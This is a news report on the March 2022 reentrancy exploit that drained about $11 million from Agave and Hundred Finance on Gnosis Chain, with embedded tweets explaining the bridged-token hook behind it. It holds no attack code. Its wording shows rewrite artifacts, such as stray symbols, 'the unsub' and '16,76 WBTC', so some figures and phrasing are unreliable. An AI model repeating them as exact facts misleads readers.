On March 15 an attacker transferred over $11 million from two DeFi platforms, Agave and Hundred Finance† According to research, it turned out to be a ‘reentrance attack’ of a flash loan on both protocols on the Gnosis chain. Likewise, the platforms stopped their contracts to prevent further damage.
assess damage
Solidity developer and maker of NFT liquidity protocol app, Shegen chose to highlight the hack in a series of tweets on March 16. Surprisingly, this analysis came after the aforementioned entity lost $225,000 in the same exploit.
There have already been a few good threads (and a few bad ones that spoke too soon) about the @Agave_lending and @HundredFinance hack today.
Here’s my analysis and reflection, having just lost over $225k to the exploit, investigating what happened 👇
— Shegen (@shegenerates) March 15, 2022
Her preliminary investigations revealed that the attack worked by leveraging a wETH contract function on Gnosis Chain. This allowed the attacker to continue borrowing crypto before the apps could calculate the debt, which would prevent further borrowing. Ergo, the unsub carried the said exploit by borrowing against the same collateral they had placed until the money was gone from the protocols.
To make matters worse, the funds were not safe. “They’re pretty much gone forever, but there’s still hope,” she says added† That said, Gnosis founder Martin Koppelmann tweeted to provide some assurance amid the chaos. Koppelmann claimed,
can’t promise anything, and first we need to really understand what happened. But in general, I’d be in favor of a GnosisDAO proposal that would try to prevent users from losing money by, for example, borrowing/investing in @Agave_lending
— Martin Köppelmann 🇺🇦 (@koeppelmann) March 15, 2022
After some further investigation, the attacker would have deployed this contract with 3 functions; In blocks 21120283 and 21120284, the hacker used the contract to communicate directly with the affected protocol, Agave. The smart contract on Agave was essentially the same as Aave, which brought in $18.4 billion.
Since no abuse has been reported in AAVE, how could Agave be emptied? Well, here’s a Overview how it was “unintentionally” used in an unsafe manner.
The weth contract was deployed the first time someone moved weth to GC. Every time you bring a new token across the bridge, a new token contract is created for it.
The callAfterTransfer function helps avoid sending tokens directly to the bridge and losing them forever pic.twitter.com/ZiAZAcTtSI
— Shegen (@shegenerates) March 15, 2022
The said hacker was able to borrow more than their collateral in agave. In doing so, walk away with all borrowable assets.
The borrowed assets consisted of 2,728.9 WETH, 243,423 USDC, 24,563 LINK, 16,76 WBTC, 8,400 GNO and 347,787 WXDAI. In total, the hacker made off with about $11 million.
Nevertheless, Shegen didn’t blame the Agave developers for not preventing the attack. She said the developers had a safe and secure AAVE-based code. although used with insecure tokens, in an insecure way.
“All DeFi protocols on GC should replace existing bridged tokens with new ones,” she concluded.
Blockchain Security Researcher Mudit Gupta repeated a similar cause behind the exploit.
Agave and Hundred Finance were exploited today on Gnosis Chain (formerly xDAI).
The underlying reason for the hack is that the official bridged tokens on Gnosis are non-default and have a hook that calls the token receiver on every transfer. This allows re-entry attacks. pic.twitter.com/8MU8Pi9RQT
— Mudit Gupta (@Mudit__Gupta) March 15, 2022